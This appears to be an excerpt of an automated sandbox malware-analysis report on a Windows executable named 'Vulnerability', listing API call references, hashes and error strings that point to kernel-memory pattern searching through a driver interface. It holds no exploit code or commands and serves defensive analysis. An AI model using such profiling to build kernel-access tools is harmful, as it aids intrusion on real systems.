                                                    • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF7738E1E19), ref: 00007FF7738ED540
                                                    • ?uncaught_exception@std@@YA_NXZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF7738E1E19), ref: 00007FF7738ED547
                                                    • ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF7738E1E19), ref: 00007FF7738ED554
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: D@std@@@std@@U?$char_traits@$?good@ios_base@std@@?sputc@?$basic_streambuf@U?$char_traits@_W@std@@@std@@$?flush@?$basic_ostream@_?setstate@?$basic_ios@?sputn@?$basic_streambuf@?uncaught_exception@std@@Osfx@?$basic_ostream@_V12@
                                                    • String ID:
                                                    • API String ID: 3858555242-0
                                                    • Opcode ID: 3a3d278f9abfa924c7819ac86336879c49577fd7e6b5cdeb5568fe49040b45a1
                                                    • Instruction ID: 054025a55437739ebdbe93145ecb16c98393fe823156abfc58ba87f9fae3d8ca
                                                    • Opcode Fuzzy Hash: 3a3d278f9abfa924c7819ac86336879c49577fd7e6b5cdeb5568fe49040b45a1
                                                    • Instruction Fuzzy Hash: 40516323628A4185EBA0AF19D490338E7A0FF94F95F598631CE5E53760CF3ED55A8320
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: V01@$??6?$basic_ostream@D@std@@@std@@U?$char_traits@V01@@$ControlDevicememcmp
                                                    • String ID: 0$[-] Can't find section$[-] Can't read module headers
                                                    • API String ID: 3070867233-813957328
                                                    • Opcode ID: ae88ce224be0fa513a1a237f5953d652758b14a64ca5b7594779ea4c29c95df2
                                                    • Instruction ID: 2aea49dc5409a91b7283b02ab319149ea58eb2883e38d65807a1a52d5b6e0cd6
                                                    • Opcode Fuzzy Hash: ae88ce224be0fa513a1a237f5953d652758b14a64ca5b7594779ea4c29c95df2
                                                    • Instruction Fuzzy Hash: CE51B132A387C281DB609B15E4402BAE3A4FB85794F940335EA9C63798DF7DD451C730
                                                    APIs
                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738E7B4D
                                                    • memset.VCRUNTIME140 ref: 00007FF7738E7B7F
                                                      • Part of subcall function 00007FF7738E5E00: DeviceIoControl.KERNEL32 ref: 00007FF7738E5E9B
                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738E7C28
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: V01@$??6?$basic_ostream@D@std@@@std@@U?$char_traits@V01@@$ControlDevicememset
                                                    • String ID: [-] Can't find pattern$[-] Can't find pattern, Too big section$[-] No module address to find pattern$[-] Read failed in FindPatternAtKernel
                                                    • API String ID: 1687902784-521562947
                                                    • Opcode ID: c4f6970c0d3319753cd87f31fc89c76cfe6ed10349820c40aa8ac09d30b6d1e7
                                                    • Instruction ID: f55ef171249936f9e9fc68802b16229736838d7233df221f26ea76501d63aed6
                                                    • Opcode Fuzzy Hash: c4f6970c0d3319753cd87f31fc89c76cfe6ed10349820c40aa8ac09d30b6d1e7
                                                    • Instruction Fuzzy Hash: 9741D253E7869740FAD0BB12A8102B9E6A1AF95BD0FC44231ED5D27391DE3EE4658330
                                                    APIs
                                                    • ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHXZ.MSVCP140 ref: 00007FF7738F3529
                                                    • ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHXZ.MSVCP140 ref: 00007FF7738F3551
                                                    • ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHXZ.MSVCP140 ref: 00007FF7738F35B8
                                                    • ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHXZ.MSVCP140 ref: 00007FF7738F35E1
                                                    • ?sbumpc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHXZ.MSVCP140 ref: 00007FF7738F3601
                                                    • ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHXZ.MSVCP140 ref: 00007FF7738F364A
                                                    • ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHXZ.MSVCP140 ref: 00007FF7738F3691
                                                    • ?sbumpc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHXZ.MSVCP140 ref: 00007FF7738F36D1
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: D@std@@@std@@U?$char_traits@$?sgetc@?$basic_streambuf@$?sbumpc@?$basic_streambuf@
                                                    • String ID:
                                                    • API String ID: 2679766405-0
                                                    • Opcode ID: 0e536adec6e8f796df28328185aa6b3c9b012cd8468e90a20fd556225c24086d
                                                    • Instruction ID: 5e738e499075b1a68cd044fd582e882a7d76280600c2d7028f53ec40decbe3c0
                                                    • Opcode Fuzzy Hash: 0e536adec6e8f796df28328185aa6b3c9b012cd8468e90a20fd556225c24086d
                                                    • Instruction Fuzzy Hash: F251C32393C68381EAE26B25D500138E6909F75BA4F984230DEAD267D5DE7FE465D330
                                                    APIs
                                                    • memset.VCRUNTIME140 ref: 00007FF7738F30C1
                                                    • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF7738F30E0
                                                    • ??0?$basic_istream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140 ref: 00007FF7738F30FF
                                                    • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF7738F3133
                                                    • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF7738F3152
                                                    • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7738F319B
                                                    • ??7ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7738F31D4
                                                      • Part of subcall function 00007FF7738F34F0: ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHXZ.MSVCP140 ref: 00007FF7738F3529
                                                      • Part of subcall function 00007FF7738F34F0: ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHXZ.MSVCP140 ref: 00007FF7738F3551
                                                      • Part of subcall function 00007FF7738F34F0: ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHXZ.MSVCP140 ref: 00007FF7738F35B8
                                                      • Part of subcall function 00007FF7738F34F0: ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHXZ.MSVCP140 ref: 00007FF7738F364A
                                                      • Part of subcall function 00007FF7738E9EF0: fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,00007FF7738E1EB3,?,?,00000000,00007FF7738E1D97), ref: 00007FF7738E9F50
                                                      • Part of subcall function 00007FF7738E9EF0: ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140(?,?,?,00007FF7738E1EB3,?,?,00000000,00007FF7738E1D97), ref: 00007FF7738E9F72
                                                    • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7738F327A
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: U?$char_traits@$D@std@@@std@@$?sgetc@?$basic_streambuf@$?setstate@?$basic_ios@Init@?$basic_streambuf@$??0?$basic_ios@??0?$basic_istream@??0?$basic_streambuf@??7ios_base@std@@D@std@@@1@_V?$basic_streambuf@fclosememset
                                                    • String ID:
                                                    • API String ID: 777851723-0
                                                    • Opcode ID: f6d979b06e38d0605af6dfecbce4140227a37eabd21b430ce7e6c2582f50442e
                                                    • Instruction ID: 4c6be5811b0395d31a8687bf2f69f7cee312c5852105ac6f1fb722806c074dee
                                                    • Opcode Fuzzy Hash: f6d979b06e38d0605af6dfecbce4140227a37eabd21b430ce7e6c2582f50442e
                                                    • Instruction Fuzzy Hash: 1D616A33628B828ADB50DF64E4802AEF7B0FB95B48F444126EB8C53A58DF7ED515CB10
                                                    APIs
                                                      • Part of subcall function 00007FF7738F32C0: NtQuerySystemInformation.NTDLL ref: 00007FF7738F32F3
                                                      • Part of subcall function 00007FF7738F32C0: VirtualFree.KERNEL32 ref: 00007FF7738F3310
                                                      • Part of subcall function 00007FF7738F32C0: VirtualAlloc.KERNEL32 ref: 00007FF7738F3326
                                                      • Part of subcall function 00007FF7738F32C0: NtQuerySystemInformation.NTDLL ref: 00007FF7738F3341
                                                      • Part of subcall function 00007FF7738F32C0: VirtualFree.KERNEL32 ref: 00007FF7738F3362
                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?,?,00000000,00000000,?,00007FF7738EE399), ref: 00007FF7738EEA56
                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?,?,00000000,00000000,?,00007FF7738EE399), ref: 00007FF7738EEAB1
                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,00000000,?,00007FF7738EE399), ref: 00007FF7738EEB2F
                                                      • Part of subcall function 00007FF7738E6440: memset.VCRUNTIME140 ref: 00007FF7738E6491
                                                      • Part of subcall function 00007FF7738E6440: DeviceIoControl.KERNEL32 ref: 00007FF7738E6510
                                                      • Part of subcall function 00007FF7738E6440: DeviceIoControl.KERNEL32 ref: 00007FF7738E65B0
                                                      • Part of subcall function 00007FF7738E6440: VirtualAlloc.KERNEL32 ref: 00007FF7738E65FA
                                                      • Part of subcall function 00007FF7738E6440: VirtualFree.KERNEL32 ref: 00007FF7738E662E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: Virtual$V01@$Free$??6?$basic_ostream@AllocControlD@std@@@std@@DeviceInformationQuerySystemU?$char_traits@V01@@$_invalid_parameter_noinfo_noreturnmemset
                                                    • String ID: wasn't found$[-] Dependency $[-] Failed to resolve import
                                                    • API String ID: 2919487795-3042260135
                                                    • Opcode ID: 5991e4841fb5c1ea0f460104cb70ed3e21fab109922d1d19e610468383c6b753
                                                    • Instruction ID: a47f430937f6f1d69fd2cb4eb065573fcbda79c2bb0d72c70f4db7ffdef3da51
                                                    • Opcode Fuzzy Hash: 5991e4841fb5c1ea0f460104cb70ed3e21fab109922d1d19e610468383c6b753
                                                    • Instruction Fuzzy Hash: AE61AE63A79B4281EE94FB12E454179E3A1AB49BC0FC44636CE8D27755EF3EE0608330
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: fgetc
                                                    • String ID:
                                                    • API String ID: 2807381905-0
                                                    • Opcode ID: e08f3c12b3a121f78b6f29c7a4dd1f19ac63be023653305744b44e4c6e2c1e59
                                                    • Instruction ID: 13870b66e733d775bf6e2e23fb08187bb51f689e373ca3694be539a4fa2b1bcf
                                                    • Opcode Fuzzy Hash: e08f3c12b3a121f78b6f29c7a4dd1f19ac63be023653305744b44e4c6e2c1e59
                                                    • Instruction Fuzzy Hash: 72817B23B28A4199EB509F75D4802ACB7B0FB48768F841236DE6D63B94DF7DD5A4C320
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                    • String ID:
                                                    • API String ID: 2016347663-0
                                                    • Opcode ID: c0ddea6af8e235d7b268d53d173512a413ede755a06527274f4e7f882de79111
                                                    • Instruction ID: cea8f0828191c17bcf65d09dfc1d82ca6831ebcfe0aa761b3eaf46bd97b61e37
                                                    • Opcode Fuzzy Hash: c0ddea6af8e235d7b268d53d173512a413ede755a06527274f4e7f882de79111
                                                    • Instruction Fuzzy Hash: B7518123A28B8195EA50BF25D50426CE3A0FB55B94F984735DE2C273C1DF7DE1A9C360
                                                    APIs
                                                    • ??0_Lockit@std@@QEAA@H@Z.MSVCP140(?,?,?,?,?,?,00000000,00007FF7738EA24A), ref: 00007FF7738EC7CD
                                                    • ??Bid@locale@std@@QEAA_KXZ.MSVCP140(?,?,?,?,?,?,00000000,00007FF7738EA24A), ref: 00007FF7738EC7E7
                                                    • ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ.MSVCP140(?,?,?,?,?,?,00000000,00007FF7738EA24A), ref: 00007FF7738EC819
                                                    • ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,00007FF7738EA24A), ref: 00007FF7738EC844
                                                    • std::_Facet_Register.LIBCPMT ref: 00007FF7738EC85D
                                                    • ??1_Lockit@std@@QEAA@XZ.MSVCP140(?,?,?,?,?,?,00000000,00007FF7738EA24A), ref: 00007FF7738EC87C
                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7738EC8A7
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Concurrency::cancel_current_taskFacet_Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterV42@@Vfacet@locale@2@std::_
                                                    • String ID:
                                                    • API String ID: 762505753-0
                                                    • Opcode ID: 266eed3913f5d7a1d60b4c7ee76ade89d20a8b01aa39343ad6821c4c750a169c
                                                    • Instruction ID: 21c7bb06e942e80aa1920c589ab05b8a7d0e514a491d4f8cd217467eb566da96
                                                    • Opcode Fuzzy Hash: 266eed3913f5d7a1d60b4c7ee76ade89d20a8b01aa39343ad6821c4c750a169c
                                                    • Instruction Fuzzy Hash: 76316E23A38B4281EA94AF11E540169F370FB98B94F880631EE9E57765DF3DE461C720
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Concurrency::cancel_current_taskD@std@@Facet_Getcat@?$ctype@Getgloballocale@locale@std@@Locimp@12@RegisterV42@@Vfacet@locale@2@std::_
                                                    • String ID:
                                                    • API String ID: 3790006010-0
                                                    • Opcode ID: 0c763d4629e5f507f84c26794426aa2e0d2119a31ca62e8413d3795295dd5607
                                                    • Instruction ID: e5c4b5753025f88269cb5b930eb7d3b3f5272e1cd930732984eb1e46618481b4
                                                    • Opcode Fuzzy Hash: 0c763d4629e5f507f84c26794426aa2e0d2119a31ca62e8413d3795295dd5607
                                                    • Instruction Fuzzy Hash: 51314023638B4281EB94AF11E440169F360FB98F94F880631DE9D1B7A5DF3DE561C720
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Concurrency::cancel_current_taskFacet_Getcat@?$ctype@_Getgloballocale@locale@std@@Locimp@12@RegisterV42@@Vfacet@locale@2@W@std@@std::_
                                                    • String ID:
                                                    • API String ID: 3972169111-0
                                                    • Opcode ID: 38b11574e157d7df582a17d2965fa23a478386c919f3031e92e9b312975c5df3
                                                    • Instruction ID: 0892e01a2224c5f60edb91841eff1a0f947d731269c47ccc270fbba5ce6fa1a9
                                                    • Opcode Fuzzy Hash: 38b11574e157d7df582a17d2965fa23a478386c919f3031e92e9b312975c5df3
                                                    • Instruction Fuzzy Hash: 28316F23A78B4281EA94AF15E440169F370FB98F94F880731EA9D277A4DF3DE560C720
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: memmovememset$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                    • String ID:
                                                    • API String ID: 2171940698-0
                                                    • Opcode ID: a35f9bb6827678611ca5e1245bbf9eb90b5f9409e54ed511a3310ff234bf8627
                                                    • Instruction ID: ac8ef51f39665ed0ff82fb7bc2caf856ce4ae5d1a430b98563e1811f6ec32e96
                                                    • Opcode Fuzzy Hash: a35f9bb6827678611ca5e1245bbf9eb90b5f9409e54ed511a3310ff234bf8627
                                                    • Instruction Fuzzy Hash: 99411466B38A8681EA50FB16D54426DE391FB58BD0F840635DE6D177C5DE3DE061C330
                                                    APIs
                                                    • memmove.VCRUNTIME140(?,?,?,?,?,0000000100000000,00007FF7738E99B2), ref: 00007FF7738ECF94
                                                    • memmove.VCRUNTIME140(?,?,?,?,?,0000000100000000,00007FF7738E99B2), ref: 00007FF7738ECFA2
                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,0000000100000000,00007FF7738E99B2), ref: 00007FF7738ECFDB
                                                    • memmove.VCRUNTIME140(?,?,?,?,?,0000000100000000,00007FF7738E99B2), ref: 00007FF7738ECFE5
                                                    • memmove.VCRUNTIME140(?,?,?,?,?,0000000100000000,00007FF7738E99B2), ref: 00007FF7738ECFF3
                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7738ED028
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                    • String ID:
                                                    • API String ID: 2016347663-0
                                                    • Opcode ID: 7774afede2dd2c65080f7186d4b5eb86b53875fec8a5485529166658e60ed2fb
                                                    • Instruction ID: 4ec31d1348444ddb0ef650c6a6bfb4a8944d4e83f9835626999a94a8697b4c20
                                                    • Opcode Fuzzy Hash: 7774afede2dd2c65080f7186d4b5eb86b53875fec8a5485529166658e60ed2fb
                                                    • Instruction Fuzzy Hash: E441A263B79A4285EE60AB16A400369E361FB44FD0F984731DE9D1B789DE7DE0A18330
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                    • String ID:
                                                    • API String ID: 2016347663-0
                                                    • Opcode ID: 9b4c4663e2db16781191eb0651c26dc5f36e1b65ffecc715211cceebdcd9d5cd
                                                    • Instruction ID: 502787d89479242c22f4548c83e684f1c721c952b0dd61fa6942d28d521d6542
                                                    • Opcode Fuzzy Hash: 9b4c4663e2db16781191eb0651c26dc5f36e1b65ffecc715211cceebdcd9d5cd
                                                    • Instruction Fuzzy Hash: 5A41D363B3965285EE54BB1294002ACE351AB04BD0FD84B32DE5D1B7D5DE3EE0A9C230
                                                    APIs
                                                    • ?_Fiopen@std@@YAPEAU_iobuf@@PEB_WHH@Z.MSVCP140 ref: 00007FF7738E9FEA
                                                    • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF7738EA007
                                                    • _get_stream_buffer_pointers.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7738EA030
                                                    • ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEBA?AVlocale@2@XZ.MSVCP140 ref: 00007FF7738EA07B
                                                      • Part of subcall function 00007FF7738EC7A0: ??0_Lockit@std@@QEAA@H@Z.MSVCP140(?,?,?,?,?,?,00000000,00007FF7738EA24A), ref: 00007FF7738EC7CD
                                                      • Part of subcall function 00007FF7738EC7A0: ??Bid@locale@std@@QEAA_KXZ.MSVCP140(?,?,?,?,?,?,00000000,00007FF7738EA24A), ref: 00007FF7738EC7E7
